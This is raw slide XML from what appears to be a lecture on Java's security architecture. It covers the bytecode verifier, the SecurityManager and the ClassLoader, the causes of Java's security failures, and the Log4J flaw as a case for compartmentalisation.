                  <a:tab pos="5422900" algn="l"/>
                  <a:tab pos="5964238" algn="l"/>
                  <a:tab pos="6507163" algn="l"/>
                  <a:tab pos="7050088" algn="l"/>
                  <a:tab pos="7591425" algn="l"/>
                  <a:tab pos="8134350" algn="l"/>
                  <a:tab pos="8677275" algn="l"/>
                  <a:tab pos="9220200" algn="l"/>
                  <a:tab pos="9761538" algn="l"/>
                  <a:tab pos="10304463" algn="l"/>
                  <a:tab pos="10847388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539750" algn="l"/>
                  <a:tab pos="1082675" algn="l"/>
                  <a:tab pos="1625600" algn="l"/>
                  <a:tab pos="2166938" algn="l"/>
                  <a:tab pos="2709863" algn="l"/>
                  <a:tab pos="3252788" algn="l"/>
                  <a:tab pos="3794125" algn="l"/>
                  <a:tab pos="4337050" algn="l"/>
                  <a:tab pos="4879975" algn="l"/>
                  <a:tab pos="5422900" algn="l"/>
                  <a:tab pos="5964238" algn="l"/>
                  <a:tab pos="6507163" algn="l"/>
                  <a:tab pos="7050088" algn="l"/>
                  <a:tab pos="7591425" algn="l"/>
                  <a:tab pos="8134350" algn="l"/>
                  <a:tab pos="8677275" algn="l"/>
                  <a:tab pos="9220200" algn="l"/>
                  <a:tab pos="9761538" algn="l"/>
                  <a:tab pos="10304463" algn="l"/>
                  <a:tab pos="10847388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539750" algn="l"/>
                  <a:tab pos="1082675" algn="l"/>
                  <a:tab pos="1625600" algn="l"/>
                  <a:tab pos="2166938" algn="l"/>
                  <a:tab pos="2709863" algn="l"/>
                  <a:tab pos="3252788" algn="l"/>
                  <a:tab pos="3794125" algn="l"/>
                  <a:tab pos="4337050" algn="l"/>
                  <a:tab pos="4879975" algn="l"/>
                  <a:tab pos="5422900" algn="l"/>
                  <a:tab pos="5964238" algn="l"/>
                  <a:tab pos="6507163" algn="l"/>
                  <a:tab pos="7050088" algn="l"/>
                  <a:tab pos="7591425" algn="l"/>
                  <a:tab pos="8134350" algn="l"/>
                  <a:tab pos="8677275" algn="l"/>
                  <a:tab pos="9220200" algn="l"/>
                  <a:tab pos="9761538" algn="l"/>
                  <a:tab pos="10304463" algn="l"/>
                  <a:tab pos="10847388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539750" algn="l"/>
                  <a:tab pos="1082675" algn="l"/>
                  <a:tab pos="1625600" algn="l"/>
                  <a:tab pos="2166938" algn="l"/>
                  <a:tab pos="2709863" algn="l"/>
                  <a:tab pos="3252788" algn="l"/>
                  <a:tab pos="3794125" algn="l"/>
                  <a:tab pos="4337050" algn="l"/>
                  <a:tab pos="4879975" algn="l"/>
                  <a:tab pos="5422900" algn="l"/>
                  <a:tab pos="5964238" algn="l"/>
                  <a:tab pos="6507163" algn="l"/>
                  <a:tab pos="7050088" algn="l"/>
                  <a:tab pos="7591425" algn="l"/>
                  <a:tab pos="8134350" algn="l"/>
                  <a:tab pos="8677275" algn="l"/>
                  <a:tab pos="9220200" algn="l"/>
                  <a:tab pos="9761538" algn="l"/>
                  <a:tab pos="10304463" algn="l"/>
                  <a:tab pos="10847388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539750" algn="l"/>
                  <a:tab pos="1082675" algn="l"/>
                  <a:tab pos="1625600" algn="l"/>
                  <a:tab pos="2166938" algn="l"/>
                  <a:tab pos="2709863" algn="l"/>
                  <a:tab pos="3252788" algn="l"/>
                  <a:tab pos="3794125" algn="l"/>
                  <a:tab pos="4337050" algn="l"/>
                  <a:tab pos="4879975" algn="l"/>
                  <a:tab pos="5422900" algn="l"/>
                  <a:tab pos="5964238" algn="l"/>
                  <a:tab pos="6507163" algn="l"/>
                  <a:tab pos="7050088" algn="l"/>
                  <a:tab pos="7591425" algn="l"/>
                  <a:tab pos="8134350" algn="l"/>
                  <a:tab pos="8677275" algn="l"/>
                  <a:tab pos="9220200" algn="l"/>
                  <a:tab pos="9761538" algn="l"/>
                  <a:tab pos="10304463" algn="l"/>
                  <a:tab pos="10847388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1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr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1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr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1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="nl-NL" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="3333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975" name="Rectangle 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8C026DB-C9A1-53AA-2244-0CE8D9983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1381" y="5068816"/>
              <a:ext cx="992161" cy="673887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9196" tIns="51583" rIns="99196" bIns="51583" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1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16000"/>
                </a:lnSpc>
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="22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VM</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="83976" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A9F1CEB-F23B-1B49-FDE7-574DA530B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275" y="2390775"/>
              <a:ext cx="1931827" cy="1960396"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="92D05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9196" tIns="51583" rIns="99196" bIns="51583" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1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16000"/>
                </a:lnSpc>
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="22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package A   </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="83977" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16D4BF12-904A-AEDF-3334-3914A1075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275" y="5061207"/>
              <a:ext cx="1090152" cy="673887"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="92D05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9196" tIns="51583" rIns="99196" bIns="51583" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1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16000"/>
                </a:lnSpc>
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="22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APIs</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="83978" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57CDAC20-EDF2-4ACD-875D-A04C8ED7B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388" y="6161037"/>
              <a:ext cx="5732487" cy="495351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9196" tIns="51583" rIns="99196" bIns="51583" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1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16000"/>
                </a:lnSpc>
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="200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hardware (CPU + peripherals)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="83979" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA208F4E-3E1E-8D06-7703-76B54804F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2659" y="5068816"/>
              <a:ext cx="1357878" cy="673887"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="92D05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9196" tIns="51583" rIns="99196" bIns="51583" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1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en-US" sz="20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Security</a:t>
              </a:r>
            </a:p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en-US" sz="20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Manager</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="83980" name="Rectangle 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{706909FC-88AD-953D-5C09-689F4D7B6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0026" y="5068816"/>
              <a:ext cx="1357878" cy="673887"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="92D05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9196" tIns="51583" rIns="99196" bIns="51583" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1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en-US" sz="20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Class</a:t>
              </a:r>
            </a:p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en-US" sz="20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Loader</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="83981" name="Rectangle 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81DF5CA0-9FA4-0A30-0043-390CA4A4B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679" y="3493498"/>
              <a:ext cx="310923" cy="657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9196" tIns="51583" rIns="99196" bIns="51583">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr>
                <a:lnSpc>
                  <a:spcPct val="116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539750" algn="l"/>
                  <a:tab pos="1082675" algn="l"/>
                  <a:tab pos="1625600" algn="l"/>
                  <a:tab pos="2166938" algn="l"/>
                  <a:tab pos="2709863" algn="l"/>
                  <a:tab pos="3252788" algn="l"/>
                  <a:tab pos="3794125" algn="l"/>
                  <a:tab pos="4337050" algn="l"/>
                  <a:tab pos="4879975" algn="l"/>
                  <a:tab pos="5422900" algn="l"/>
                  <a:tab pos="5964238" algn="l"/>
                  <a:tab pos="6507163" algn="l"/>
                  <a:tab pos="7050088" algn="l"/>
                  <a:tab pos="7591425" algn="l"/>
                  <a:tab pos="8134350" algn="l"/>
                  <a:tab pos="8677275" algn="l"/>
                  <a:tab pos="9220200" algn="l"/>
                  <a:tab pos="9761538" algn="l"/>
                  <a:tab pos="10304463" algn="l"/>
                  <a:tab pos="10847388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1pPr>
              <a:lvl2pPr>
                <a:lnSpc>
                  <a:spcPct val="116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539750" algn="l"/>
                  <a:tab pos="1082675" algn="l"/>
                  <a:tab pos="1625600" algn="l"/>
                  <a:tab pos="2166938" algn="l"/>
                  <a:tab pos="2709863" algn="l"/>
                  <a:tab pos="3252788" algn="l"/>
                  <a:tab pos="3794125" algn="l"/>
                  <a:tab pos="4337050" algn="l"/>
                  <a:tab pos="4879975" algn="l"/>
                  <a:tab pos="5422900" algn="l"/>
                  <a:tab pos="5964238" algn="l"/>
                  <a:tab pos="6507163" algn="l"/>
                  <a:tab pos="7050088" algn="l"/>
                  <a:tab pos="7591425" algn="l"/>
                  <a:tab pos="8134350" algn="l"/>
                  <a:tab pos="8677275" algn="l"/>
                  <a:tab pos="9220200" algn="l"/>
                  <a:tab pos="9761538" algn="l"/>
                  <a:tab pos="10304463" algn="l"/>
                  <a:tab pos="10847388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2pPr>
              <a:lvl3pPr>
                <a:lnSpc>
                  <a:spcPct val="116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539750" algn="l"/>
                  <a:tab pos="1082675" algn="l"/>
                  <a:tab pos="1625600" algn="l"/>
                  <a:tab pos="2166938" algn="l"/>
                  <a:tab pos="2709863" algn="l"/>
                  <a:tab pos="3252788" algn="l"/>
                  <a:tab pos="3794125" algn="l"/>
                  <a:tab pos="4337050" algn="l"/>
                  <a:tab pos="4879975" algn="l"/>
                  <a:tab pos="5422900" algn="l"/>
                  <a:tab pos="5964238" algn="l"/>
                  <a:tab pos="6507163" algn="l"/>
                  <a:tab pos="7050088" algn="l"/>
                  <a:tab pos="7591425" algn="l"/>
                  <a:tab pos="8134350" algn="l"/>
                  <a:tab pos="8677275" algn="l"/>
                  <a:tab pos="9220200" algn="l"/>
                  <a:tab pos="9761538" algn="l"/>
                  <a:tab pos="10304463" algn="l"/>
                  <a:tab pos="10847388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3pPr>
              <a:lvl4pPr>
                <a:lnSpc>
                  <a:spcPct val="116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539750" algn="l"/>
                  <a:tab pos="1082675" algn="l"/>
                  <a:tab pos="1625600" algn="l"/>
                  <a:tab pos="2166938" algn="l"/>
                  <a:tab pos="2709863" algn="l"/>
                  <a:tab pos="3252788" algn="l"/>
                  <a:tab pos="3794125" algn="l"/>
                  <a:tab pos="4337050" algn="l"/>
                  <a:tab pos="4879975" algn="l"/>
                  <a:tab pos="5422900" algn="l"/>
                  <a:tab pos="5964238" algn="l"/>
                  <a:tab pos="6507163" algn="l"/>
                  <a:tab pos="7050088" algn="l"/>
                  <a:tab pos="7591425" algn="l"/>
                  <a:tab pos="8134350" algn="l"/>
                  <a:tab pos="8677275" algn="l"/>
                  <a:tab pos="9220200" algn="l"/>
                  <a:tab pos="9761538" algn="l"/>
                  <a:tab pos="10304463" algn="l"/>
                  <a:tab pos="10847388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4pPr>
              <a:lvl5pPr>
                <a:lnSpc>
                  <a:spcPct val="116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539750" algn="l"/>
                  <a:tab pos="1082675" algn="l"/>
                  <a:tab pos="1625600" algn="l"/>
                  <a:tab pos="2166938" algn="l"/>
                  <a:tab pos="2709863" algn="l"/>
                  <a:tab pos="3252788" algn="l"/>
                  <a:tab pos="3794125" algn="l"/>
                  <a:tab pos="4337050" algn="l"/>
                  <a:tab pos="4879975" algn="l"/>
                  <a:tab pos="5422900" algn="l"/>
                  <a:tab pos="5964238" algn="l"/>
                  <a:tab pos="6507163" algn="l"/>
                  <a:tab pos="7050088" algn="l"/>
                  <a:tab pos="7591425" algn="l"/>
                  <a:tab pos="8134350" algn="l"/>
                  <a:tab pos="8677275" algn="l"/>
                  <a:tab pos="9220200" algn="l"/>
                  <a:tab pos="9761538" algn="l"/>
                  <a:tab pos="10304463" algn="l"/>
                  <a:tab pos="10847388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5pPr>
              <a:lvl6pPr marL="25146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539750" algn="l"/>
                  <a:tab pos="1082675" algn="l"/>
                  <a:tab pos="1625600" algn="l"/>
                  <a:tab pos="2166938" algn="l"/>
                  <a:tab pos="2709863" algn="l"/>
                  <a:tab pos="3252788" algn="l"/>
                  <a:tab pos="3794125" algn="l"/>
                  <a:tab pos="4337050" algn="l"/>
                  <a:tab pos="4879975" algn="l"/>
                  <a:tab pos="5422900" algn="l"/>
                  <a:tab pos="5964238" algn="l"/>
                  <a:tab pos="6507163" algn="l"/>
                  <a:tab pos="7050088" algn="l"/>
                  <a:tab pos="7591425" algn="l"/>
                  <a:tab pos="8134350" algn="l"/>
                  <a:tab pos="8677275" algn="l"/>
                  <a:tab pos="9220200" algn="l"/>
                  <a:tab pos="9761538" algn="l"/>
                  <a:tab pos="10304463" algn="l"/>
                  <a:tab pos="10847388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6pPr>
              <a:lvl7pPr marL="29718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539750" algn="l"/>
                  <a:tab pos="1082675" algn="l"/>
                  <a:tab pos="1625600" algn="l"/>
                  <a:tab pos="2166938" algn="l"/>
                  <a:tab pos="2709863" algn="l"/>
                  <a:tab pos="3252788" algn="l"/>
                  <a:tab pos="3794125" algn="l"/>
                  <a:tab pos="4337050" algn="l"/>
                  <a:tab pos="4879975" algn="l"/>
                  <a:tab pos="5422900" algn="l"/>
                  <a:tab pos="5964238" algn="l"/>
                  <a:tab pos="6507163" algn="l"/>
                  <a:tab pos="7050088" algn="l"/>
                  <a:tab pos="7591425" algn="l"/>
                  <a:tab pos="8134350" algn="l"/>
                  <a:tab pos="8677275" algn="l"/>
                  <a:tab pos="9220200" algn="l"/>
                  <a:tab pos="9761538" algn="l"/>
                  <a:tab pos="10304463" algn="l"/>
                  <a:tab pos="10847388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7pPr>
              <a:lvl8pPr marL="34290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539750" algn="l"/>
                  <a:tab pos="1082675" algn="l"/>
                  <a:tab pos="1625600" algn="l"/>
                  <a:tab pos="2166938" algn="l"/>
                  <a:tab pos="2709863" algn="l"/>
                  <a:tab pos="3252788" algn="l"/>
                  <a:tab pos="3794125" algn="l"/>
                  <a:tab pos="4337050" algn="l"/>
                  <a:tab pos="4879975" algn="l"/>
                  <a:tab pos="5422900" algn="l"/>
                  <a:tab pos="5964238" algn="l"/>
                  <a:tab pos="6507163" algn="l"/>
                  <a:tab pos="7050088" algn="l"/>
                  <a:tab pos="7591425" algn="l"/>
                  <a:tab pos="8134350" algn="l"/>
                  <a:tab pos="8677275" algn="l"/>
                  <a:tab pos="9220200" algn="l"/>
                  <a:tab pos="9761538" algn="l"/>
                  <a:tab pos="10304463" algn="l"/>
                  <a:tab pos="10847388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8pPr>
              <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="492125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539750" algn="l"/>
                  <a:tab pos="1082675" algn="l"/>
                  <a:tab pos="1625600" algn="l"/>
                  <a:tab pos="2166938" algn="l"/>
                  <a:tab pos="2709863" algn="l"/>
                  <a:tab pos="3252788" algn="l"/>
                  <a:tab pos="3794125" algn="l"/>
                  <a:tab pos="4337050" algn="l"/>
                  <a:tab pos="4879975" algn="l"/>
                  <a:tab pos="5422900" algn="l"/>
                  <a:tab pos="5964238" algn="l"/>
                  <a:tab pos="6507163" algn="l"/>
                  <a:tab pos="7050088" algn="l"/>
                  <a:tab pos="7591425" algn="l"/>
                  <a:tab pos="8134350" algn="l"/>
                  <a:tab pos="8677275" algn="l"/>
                  <a:tab pos="9220200" algn="l"/>
                  <a:tab pos="9761538" algn="l"/>
                  <a:tab pos="10304463" algn="l"/>
                  <a:tab pos="10847388" algn="l"/>
                </a:tabLst>
                <a:defRPr sz="2000">
                  <a:solidFill>
                    <a:srgbClr val="000000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 eaLnBrk="1">
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="nl-NL" sz="310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83982" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{239DCB6C-5E7F-EA57-BDBB-9090A53AD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5079" y="2390775"/>
              <a:ext cx="1931827" cy="1960396"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="92D05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9196" tIns="51583" rIns="99196" bIns="51583" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1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4921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38163" algn="l"/>
                  <a:tab pos="1081088" algn="l"/>
                  <a:tab pos="1624013" algn="l"/>
                  <a:tab pos="2165350" algn="l"/>
                  <a:tab pos="2708275" algn="l"/>
                  <a:tab pos="3251200" algn="l"/>
                  <a:tab pos="3792538" algn="l"/>
                  <a:tab pos="4335463" algn="l"/>
                  <a:tab pos="4878388" algn="l"/>
                  <a:tab pos="5421313" algn="l"/>
                  <a:tab pos="5962650" algn="l"/>
                  <a:tab pos="6505575" algn="l"/>
                  <a:tab pos="7048500" algn="l"/>
                  <a:tab pos="7589838" algn="l"/>
                  <a:tab pos="8132763" algn="l"/>
                  <a:tab pos="8675688" algn="l"/>
                  <a:tab pos="9218613" algn="l"/>
                  <a:tab pos="9759950" algn="l"/>
                  <a:tab pos="10302875" algn="l"/>
                  <a:tab pos="10845800" algn="l"/>
                </a:tabLs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16000"/>
                </a:lnSpc>
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="22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package B</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="66FF33"/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el 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7CA9E0B-C81D-6231-33C2-5B4F7D7F9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TCB for Java’s code-based access control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81C2F9-791A-7650-73A4-E21118530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sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Byte Code Verifier (BCV) </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1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GB" sz="1800" dirty="0" err="1"/>
              <a:t>typechecks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> the byte code</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="18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GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virtual Machine (VM) </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1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GB" sz="1800" dirty="0"/>
              <a:t>executes the byte code (with some type-checking at run time)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SecurityManager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="18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</a:rPr>
              <a:t>does the runtime access control by stack walking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ClassLoader</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1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</a:rPr>
              <a:t>downloads additional code, invoking BCV &amp; updating policies for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SecurityManager</a:t>
            </a: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defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB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>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill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86020" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F81D90D-EA05-300B-96C0-B3EA6893A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9C603587-711C-4A6C-BF79-CE7322A8CEE5}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C08B977B-E451-9E25-BFCC-AEB6252B30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security failure of Java (1)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243901-4A92-3522-ED3E-42438430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GB" dirty="0"/>
              <a:t>Nice ideas, but Java has resulted in many security worries.                       Some contributing / root causes of the security problems:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Large TCB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> with  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>large &amp; complex attack surface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, growing over time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800" dirty="0"/>
              <a:t>Many classes in the core Java API are in the TCB and can be accessed by malicious code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800" dirty="0"/>
              <a:t>Security-critical components (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>ClassLoader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>SecurityManager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>) are implemented in Java &amp; runs on the same VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Apart from logical flaws, there are risks of these components accidentally exposing a field as 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GB" sz="1800" dirty="0"/>
              <a:t> or sharing a reference to mutable object with untrusted code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800" dirty="0"/>
              <a:t>Java’s reflection mechanism makes all this much more complex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The possibility to download code over the internet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is a dangerous capability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, even if it is protected &amp; controlled                                           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pP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Messy update mechanism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>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill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91140" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F0D242F-5A52-3DDA-A4EC-A60F2B8435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B913136-5D18-472F-9461-45BE3FCA685C}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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4E302-8313-D5D8-B814-7E8912EF1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security failure of Java (2)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494F0-B19D-CE3C-D2D9-412E77A63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Different kind of problem with Java’s nice sandboxing possibilities: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        People do not use it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December 2021 a security vulnerability in open-source Log4J logging API was revealed, which affected many systems.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Compartmentalization of the logging functionality </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>does the logging functionality need  network access?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is natural &amp; obvious, but clearly nobody does it.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Dutch NCSC did useful work when Log4J flaw hit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
